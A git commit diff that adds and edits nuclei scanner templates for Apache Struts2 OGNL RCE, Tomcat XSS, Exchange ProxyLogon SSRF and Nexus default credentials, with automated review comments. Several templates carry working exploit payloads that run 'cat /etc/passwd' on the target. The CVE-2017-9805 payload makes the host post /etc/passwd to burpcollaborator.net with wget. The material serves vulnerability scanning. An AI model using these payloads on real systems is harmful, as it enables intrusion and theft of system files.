Merge pull request #25 from projectdiscovery/master

updation
patch-1
Dhiyaneshwaran 2021-03-07 19:15:49 +05:30 committed by GitHub
commit bbf5bf4b5a
23 changed files with 400 additions and 46 deletions


@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc
| Templates | Counts | Templates | Counts | Templates | Counts |
| -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ |
| cves | 221 | vulnerabilities | 105 | exposed-panels | 95 |
| exposures | 60 | technologies | 50 | misconfiguration | 50 |
| workflows | 23 | miscellaneous | 16 | default-logins | 17 |
| cves | 229 | vulnerabilities | 105 | exposed-panels | 100 |
| exposures | 60 | technologies | 50 | misconfiguration | 51 |
| workflows | 23 | miscellaneous | 16 | default-logins | 18 |
| exposed-tokens | 9 | dns | 6 | fuzzing | 4 |
| helpers | 2 | takeovers | 1 | - | - |
**69 directories, 672 files**.
**72 directories, 687 files**.
</td>
</tr>


@ -0,0 +1,29 @@
id: CVE-2007-4556
info:
name: Apache Struts2 S2-001 RCE
author: pikpikcu
severity: critical
reference: https://www.guildhab.top/?p=2326
tags: cve,cve2007,apache,rce,struts
requests:
- method: POST
path:
- "{{BaseURL}}/login.action"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
part: body
- type: status
status:
- 200
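Review bot: The form-encoded POST body under `body: |` keeps the block scalar's trailing newline, so an extra byte is sent after the OGNL expression; `body: |-` gives exactly the intended payload, and the same `|` header is used in the new CVE-2013-1965 and CVE-2017-9791 bodies. Unlike the CVE-2013-2251 and CVE-2017-5638 templates edited in this commit, none of the new Struts templates (this one, CVE-2012-0392, CVE-2013-1965, CVE-2017-12611, CVE-2017-9791, CVE-2018-11776) carries a `description:`; a one-sentence summary of the advisory and affected versions per template would make them self-explanatory. The expression here also runs an OS command on the target and echoes its output, while the CVE-2017-5638 template in the same repo is explicitly detection-only; a side-effect-free check that the expression was evaluated would be the less intrusive probe for a scanner template.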


@ -0,0 +1,24 @@
id: CVE-2012-0392
info:
name: Apache Struts2 S2-008 RCE
author: pikpikcu
severity: critical
reference: https://blog.csdn.net/weixin_43416469/article/details/113850545
tags: cve, cve2012,apache,rce,struts
requests:
- method: GET
path:
- "{{BaseURL}}/devmode.action?debug=command&expression=(%23_memberAccess[%22allowStaticMethodAccess%22]%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D%23foo%2C@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27cat%20/etc/passwd%27).getInputStream()))"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
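Review bot: `tags: cve, cve2012,apache,rce,struts` has a space after the first comma, so the second tag is ` cve2012` with a leading space unless the tag loader trims it, whereas every other template in this commit writes the list without whitespace; change it to `tags: cve,cve2012,apache,rce,struts`. The same form appears in the new CVE-2017-9791 template (`tags: cve, cve2017,apache,rce`), which additionally lacks the `struts` tag that this very commit adds to the other Struts templates.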


@ -0,0 +1,28 @@
id: CVE-2013-1965
info:
name: Apache Struts2 S2-012 RCE
author: pikpikcu
severity: critical
reference: https://nvd.nist.gov/vuln/detail/CVE-2013-1965
tags: cve,cve2013,apache,rce,struts
requests:
- method: POST
path:
- "{{BaseURL}}/user.action"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
name=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C+%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200


@ -5,7 +5,7 @@ info:
author: exploitation & @dwisiswant0
severity: critical
description: In Struts 2 before 2.3.15.1 the information following "action:", "redirect:" or "redirectAction:" is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code.
tags: cve,cve2013,rce
tags: cve,cve2013,rce,struts,apache
requests:
- payloads:


@ -1,11 +1,11 @@
id: CVE-2016-3081
info:
name: S2-032 Struts RCE
name: Apache S2-032 Struts RCE
author: dhiyaneshDK
severity: high
reference: https://cwiki.apache.org/confluence/display/WW/S2-032
tags: cve,cve2016,struts,rce
tags: cve,cve2016,struts,rce,apache
requests:
- raw:


@ -0,0 +1,24 @@
id: CVE-2017-12611
info:
name: Apache Struts2 S2-053 RCE
author: pikpikcu
severity: critical
reference: https://nvd.nist.gov/vuln/detail/CVE-2017-12611
tags: cve,cve2017,apache,rce,struts
requests:
- method: POST
path:
- "{{BaseURL}}/?name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
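Review bot: `name: Apache Struts2 S2-053 RCE` is also the name given to the new CVE-2017-9791 template in this commit, so the two are indistinguishable in scan output. CVE-2017-12611 is indeed S2-053, while CVE-2017-9791 is the S2-048 advisory (the Struts 1 plugin showcase endpoint `/integration/saveGangster.action` used there is the S2-048 path), so the CVE-2017-9791 template is the one to rename, e.g. `name: Apache Struts2 S2-048 RCE`. As in the sibling templates, the regex matcher omits `part: body`, which the CVE-2007-4556 template states explicitly; either write it everywhere or nowhere for consistency.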


@ -1,10 +1,10 @@
id: CVE-2017-5638
info:
author: "Random Robbie"
name: "Struts2 RCE "
author: Random Robbie
name: Apache Struts2 RCE
severity: critical
description: Struts is vulnerable to remote command injection attacks through incorrectly parsing an attackers invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server.
tags: cve,cve2017,struts,rce
tags: cve,cve2017,struts,rce,apache
# This template supports the detection part only.
# Do not test any website without permission


@ -0,0 +1,33 @@
id: CVE-2017-9791
info:
name: Apache Struts2 S2-053 RCE
author: pikpikcu
severity: critical
reference: https://nvd.nist.gov/vuln/detail/CVE-2017-9791
tags: cve, cve2017,apache,rce
requests:
- method: POST
path:
- "{{BaseURL}}/integration/saveGangster.action"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
name=%25%7b%28%23%64%6d%3d%40%6f%67%6e%6c%2e%4f%67%6e%6c%43%6f%6e%74%65%78%74%40%44%45%46%41%55%4c%54%5f%4d%45%4d%42%45%52%5f%41%43%43%45%53%53%29%2e%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3f%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3d%23%64%6d%29%3a%28%28%23%63%6f%6e%74%61%69%6e%65%72%3d%23%63%6f%6e%74%65%78%74%5b%27%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%41%63%74%69%6f%6e%43%6f%6e%74%65%78%74%2e%63%6f%6e%74%61%69%6e%65%72%27%5d%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%3d%23%63%6f%6e%74%61%69%6e%65%72%2e%67%65%74%49%6e%73%74%61%6e%63%65%28%40%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%6f%67%6e%6c%2e%4f%67%6e%6c%55%74%69%6c%40%63%6c%61%73%73%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%50%61%63%6b%61%67%65%4e%61%6d%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%43%6c%61%73%73%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%63%6f%6e%74%65%78%74%2e%73%65%74%4d%65%6d%62%65%72%41%63%63%65%73%73%28%23%64%6d%29%29%29%29%2e%28%23%71%3d%40%6f%72%67%2e%61%70%61%63%68%65%2e%63%6f%6d%6d%6f%6e%73%2e%69%6f%2e%49%4f%55%74%69%6c%73%40%74%6f%53%74%72%69%6e%67%28%40%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%40%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%27%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%27%29%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%29%29%2e%28%23%71%29%7d&age=10&__checkbox_bustedBefore=true&description=
matchers-condition: and
matchers:
- type: word
words:
- "Content-Type: text/html"
part: header
- type: regex
regex:
- "root:[x*]:0:0"
condition: and
- type: status
status:
- 200
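Review bot: The POST body is percent-encoded character by character (`%6f%67%6e%6c` for `ognl`, and so on for every letter), which makes the expression unreadable in review and hides that it is essentially the same OGNL chain as the CVE-2017-12611 template, where only reserved characters are encoded. Encoding only what `application/x-www-form-urlencoded` requires would keep the payload readable and diffable against its sibling. The header matcher `Content-Type: text/html` appears to be a case-sensitive substring check; matching on `text/html` alone, as the new CVE-2019-0221 template does, would tolerate header-name casing differences between servers.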


@ -0,0 +1,87 @@
id: CVE-2017-9805
info:
name: Apache Struts2 S2-052 RCE
author: pikpikcu
severity: critical
reference: https://nvd.nist.gov/vuln/detail/CVE-2017-9805
tags: cve,cve2017,apache,rce,struts
requests:
- method: POST
path:
- "{{BaseURL}}/struts2-rest-showcase/orders/3"
- "{{BaseURL}}/orders/3"
headers:
Content-Type: application/xml
body: |
<map>
<entry>
<jdk.nashorn.internal.objects.NativeString>
<flags>0</flags>
<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
<dataHandler>
<dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
<is class="javax.crypto.CipherInputStream">
<cipher class="javax.crypto.NullCipher">
<initialized>false</initialized>
<opmode>0</opmode>
<serviceIterator class="javax.imageio.spi.FilterIterator">
<iter class="javax.imageio.spi.FilterIterator">
<iter class="java.util.Collections$EmptyIterator"/>
<next class="java.lang.ProcessBuilder">
<command>
<string>wget</string>
<string>--post-file</string>
<string>/etc/passwd</string>
<string>burpcollaborator.net</string>
</command>
<redirectErrorStream>false</redirectErrorStream>
</next>
</iter>
<filter class="javax.imageio.ImageIO$ContainsFilter">
<method>
<class>java.lang.ProcessBuilder</class>
<name>start</name>
<parameter-types/>
</method>
<name>asdasd</name>
</filter>
<next class="string">asdasd</next>
</serviceIterator>
<lock/>
</cipher>
<input class="java.lang.ProcessBuilder$NullInputStream"/>
<ibuffer></ibuffer>
<done>false</done>
<ostart>0</ostart>
<ofinish>0</ofinish>
<closed>false</closed>
</is>
<consumed>false</consumed>
</dataSource>
<transferFlavors/>
</dataHandler>
<dataLen>0</dataLen>
</value>
</jdk.nashorn.internal.objects.NativeString>
<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
</entry>
<entry>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
</entry>
</map>
matchers-condition: and
matchers:
- type: word
words:
- "Debugging information"
- "com.thoughtworks.xstream.converters.collections.MapConverter"
condition: and
- type: status
status:
- 500
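Review bot: The matchers at the end of the hunk only look for the XStream error text (`Debugging information`, `com.thoughtworks.xstream.converters.collections.MapConverter`) and a 500, so detection does not depend on the embedded `ProcessBuilder` command at all; yet that `<command>` makes the scanned host post `/etc/passwd` to the hard-coded third-party domain `burpcollaborator.net`, which the scan operator does not control. Replacing the argument list with a harmless one, or with a placeholder host the operator owns, keeps the template a pure detection check with the same matchers. A `description:` naming the affected Struts REST plugin versions is also missing.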


@ -0,0 +1,24 @@
id: CVE-2018-11776
info:
name: Apache Struts2 S2-057 RCE
author: pikpikcu
severity: critical
reference: https://github.com/jas502n/St2-057
tags: cve,cve2018,apache,rce,struts2
requests:
- method: GET
path:
- "{{BaseURL}}/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
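Review bot: `tags: cve,cve2018,apache,rce,struts2` uses `struts2`, whereas this commit normalizes every other Struts template to `struts` (CVE-2013-2251, CVE-2016-3081, CVE-2017-5638, CVE-2020-17530 and the new S2 templates), so a `-tags struts` run would skip this one; change it to `tags: cve,cve2018,apache,rce,struts`. The regex matcher is the same `root:[x*]:0:0` pattern as the sibling templates, which is fine, but a `description:` summarizing the S2-057 namespace-injection condition is absent.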


@ -0,0 +1,34 @@
id: CVE-2019-0221
info:
name: Apache Tomcat XSS
author: pikpikcu
severity: low
reference: https://nvd.nist.gov/vuln/detail/CVE-2019-0221
description: |
The SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and
7.0.0 to 7.0.93 echoes user provided data without escaping and is,
therefore, vulnerable to XSS. SSI is disabled by default.
The printenv command is intended for debugging and is unlikely to be present in a production website.
tags: cve,cve2019,apache,xss
requests:
- method: GET
path:
- "{{BaseURL}}/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E"
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert('xss')</script>"
- type: word
words:
- "text/html"
part: header
- type: status
status:
- 200
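Review bot: `tags: cve,cve2019,apache,xss` carries no product tag, while the Struts templates in this commit are given `struts` alongside `apache`; add `tomcat` so the template is reachable with `-tags tomcat`. The `description: |` block keeps a trailing newline in the description string; `|-` is the cleaner form for prose, though the difference is cosmetic here.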


@ -6,9 +6,7 @@ info:
severity: high
description: Zoho ManageEngine OpManager Stable build before 124196 and Released build before 125125 allows an unauthenticated attacker to read arbitrary files on the server by sending a crafted request.
tags: cve,cve2020,zoho,traversal
# References:
# - https://github.com/BeetleChunks/CVE-2020-12116
reference: https://github.com/BeetleChunks/CVE-2020-12116
requests:
- raw:


@ -1,27 +0,0 @@
id: CVE-2020-14815
info:
name: Oracle Business Intelligence XSS
author: pikpikcu
severity: medium
reference: https://www.oracle.com/security-alerts/cpuoct2020.html
tags: cve,cve2020,oracle,xss
source: https://twitter.com/HackerOn2Wheels/status/1326927875279380480
requests:
- method: GET
path:
- "{{BaseURL}}/bi-security-login/login.jsp?msi=false&redirect=%22%3E%3Cimg/src/onerror%3dalert(document.domain)%3E"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "X-Oracle-Dms-Ecid:"
- "X-Oracle-Dms-Rid:"
- "Set-Cookie:"
part: header
condition: and


@ -5,7 +5,7 @@ info:
author: pikpikcu
severity: critical
reference: http://packetstormsecurity.com/files/160721/Apache-Struts-2-Forced-Multi-OGNL-Evaluation.html
tags: cve,cve2020,apache,rce
tags: cve,cve2020,apache,rce,struts
# Forced OGNL evaluation, when evaluated on raw user input in tag attributes,
# may lead to remote code execution. Affected software : Apache Struts 2.0.0 - Struts 2.5.25.


@ -0,0 +1,34 @@
id: CVE-2021-26855
info:
name: Exchange Server SSRF Vulnerability
author: madrobot
severity: critical
description: |
Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078.
tags: cve,cve2021,ssrf,rce,exchange
reference: |
- https://proxylogon.com/#timeline
- https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse
- https://www.shodan.io/search?query=vuln%3ACVE-2021-26855
- https://gist.github.com/testanull/324546bffab2fe4916d0f9d1f03ffa09
requests:
- raw:
- |
GET /owa/auth/x.js HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Cookie: X-AnonResource=true; X-AnonResource-Backend=burpcollaborator.net/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;
Accept-Language: en
Connection: close
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "Burp Collaborator Server"
part: body
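Review bot: Detection relies on the scanned Exchange server reaching `burpcollaborator.net` through the `X-AnonResource-Backend` cookie value and on the body matcher `Burp Collaborator Server`, a banner belonging to a third party the operator does not control; an egress-filtered server yields a false negative, and any change to that banner breaks the template silently. A placeholder host under the operator's control, or a signal from the local `X-BEResource=localhost/...` backend request already present in the cookie, would be more robust. The `description:` runs two sentences together, `Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from ...`; a period after `Vulnerability` fixes it. `reference: |` stores the four URLs as one block string with leading dashes rather than as a list, which reads as a list but is not one.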


@ -24,7 +24,7 @@ requests:
------WebKitFormBoundarySHHbUsfCoxlX1bpS
Content-Disposition: form-data; name="file"; filename="poc.txt"
Content-Type: imnage/png
Content-Type: image/png
POC_TEST


@ -0,0 +1,31 @@
id: nexus-default-password
info:
name: Nexus Default Password
author: pikpikcu
severity: high
tags: nexus,dlogin
requests:
- raw:
- |
POST /service/rapture/session HTTP/1.1
Host: {{Hostname}}
Content-Length: 43
X-Nexus-UI: true
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Connection: close
username=YWRtaW4%3D&password=YWRtaW4xMjM%3D
matchers-condition: and
matchers:
- type: status
status:
- 204
- type: word
words:
- "Server: Nexus"
- "NXSESSIONID"
part: header
condition: and
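Review bot: `Content-Length: 43` is hard-coded while the raw request is written as `- |`, which keeps the block scalar's trailing newline, so the body on the wire is 44 bytes unless nuclei recomputes the header; either drop the `Content-Length` line and let the client set it, or use `- |-`. The form values are base64-encoded credentials, which is not obvious from the template; a comment above the request such as `# form values are the base64-encoded default Nexus credentials` would help a reviewer. The template also has no `description:` or `reference:`, unlike the other new templates in this commit.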


@ -10,6 +10,7 @@ requests:
path:
- "{{BaseURL}}/.hg/hgrc"
matchers-condition: and
matchers:
- type: word
words:
@ -19,4 +20,4 @@ requests:
- type: status
status:
- 200
- 200


@ -2,7 +2,7 @@ id: phpinfo-files
info:
name: phpinfo Disclosure
author: pd-team & daffainfo
author: pd-team & daffainfo & meme-lord
severity: low
requests:
@ -25,9 +25,22 @@ requests:
- "{{BaseURL}}/infos.php"
- "{{BaseURL}}/linusadmin-phpinfo.php"
- "{{BaseURL}}/php-info.php"
matchers-condition: and
matchers:
- type: word
words:
- "PHP Extension"
- "PHP Version"
condition: and
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '>PHP Version <\/td><td class="v">([0-9.]+)'


@ -4,7 +4,7 @@ info:
name: Apache Struts setup in Debug-Mode
author: pd-team
severity: low
tags: logs,struts
tags: logs,struts,apache
requests:
- method: GET


@ -0,0 +1,21 @@
id: gitlab-snippets
info:
name: GitLab public snippets
author: pdteam
severity: info
reference: https://gist.github.com/vysecurity/20311c29d879e0aba9dcffbe72a88b10
requests:
- method: GET
path:
- "{{BaseURL}}/explore/snippets"
matchers-condition: and
matchers:
- type: word
words:
- '<title>Snippets · Explore · GitLab</title>'
- type: status
status:
- 200
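Review bot: The template has no `tags:` line, so it cannot be selected with `-tags` the way every other template in this commit can; add one using the repository's established tag names (for example `tags: gitlab,exposure`, a constructed value to be checked against existing templates). The author `pdteam` also differs from `pd-team` used in the phpinfo and Struts debug-mode templates; one spelling should be used. The `<title>` matcher depends on the exact Unicode middle dot in `Snippets · Explore · GitLab`, which is fine while the file stays UTF-8 but is worth a short comment so a later edit does not replace it with an ASCII character.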


@ -1,4 +1,4 @@
id: microsoft-echange-server-detect
id: microsoft-exchange-server-detect
info:
name: Microsoft Exchange Server Detect